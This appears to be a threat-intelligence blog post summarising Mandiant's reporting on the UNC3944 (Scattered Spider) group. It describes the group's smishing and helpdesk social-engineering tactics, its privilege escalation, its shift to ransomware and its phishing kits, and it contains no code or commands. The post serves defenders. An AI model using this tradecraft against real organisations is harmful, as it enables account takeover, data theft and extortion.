UNC3944 is a group which uses social engineering and smishing (SMS phishing) to obtain credentials from its victims through fake sites and organisation infiltration. This group uses the acquired data to gain access to the system and subsequent escalation. They are also known as 0ktapus, Scatter Swine or Scattered Spider. In mid-2023, UNC3944 started switching to using ransomware in victim’s environments, most likely to increase the group’s earnings through extortion.
The most well-known tactics, techniques, and procedures observed during the UNC3944’s operation were:
- Using social engineering to gain access to victim’s system, e.g., smishing campaigns, calling helpdesk – to force password resets or obtain access codes for multi-component authentication.
- Using publicly accessible networks (e.g., in restaurants or coffee shops) in the same local area as the target of the attack – this is how cybercriminals tried to hide their presence and deceive security monitoring systems.
- Using legal software, including remote access programmes that can be downloaded from producers’ websites, such as AnyDesk.
- Operating at an extreme pace, gaining access to critical systems, and acquiring large amounts of data in a matter of days – such a pace can surprise victims’ security systems.
- A thorough analysis of the victim’s resources (e.g. internal documentation, internal call logs) aimed to find information that can help escalate privileged access and maintain a presence in the system.
- Privileged access escalation, obtained most often through attacks on password managers or privileged access management (PAM) systems.
- Creating non-managed virtual machines in the victim’s environment where attacks are launched.
- While using ransomware, cybercriminals mainly attack virtual machines and other systems that are critical to an organisation in an attempt to maximise the negative impact on their victim.
- Aggressive communication with victims, through leaving threatening notes in systems, contacting managers by text and e-mail, and infiltrating of communication channels utilised for incident handling to tailor subsequent threats to the victim’s actions.
Figure 1. UNC3944 group attack life cycle, source: Mandiant.com
Phishing tools linked to UNC3944’s activity
Mandiant has identified three tools that the UNC3944 has been using to make phishing campaigns more convenient for themselves.
- The first tool was named EIGHTBAIT – it uses Telegram’s channel to send intercepted login data to the attacker. The tool can also deploy AnyDesk in the victim’s system to gain remote control of it, so the kit was designed with desktop systems in mind. It was used between the end of 2021 and mid-2022.
- The next tool is a new phishing kit, the usage of which was observed in the third quarter of 2023. It uses a copy of the organisation’s authentication page to steal data from the victim. The tool has been used for recent break-ins.
- In mid-2023, a third tool was identified. It was used at the same time as the second one. It was inspired by the second tool, however, this one includes minor changes in the code.
The UNC3944 also uses publicly available tools to steal credentials and puts considerable effort into searching through internal systems to identify ways to obtain privileged access credentials. For example, the group uses the script PowerShell in order to download ULTRAKNOT or Meduza stealer to victim systems.
To discover more about the activities of the UNC3944 group, read the insightful source texts:
Financially Motivated UNC3944 Threat Actor Shifts Focus to Ransomware Attacks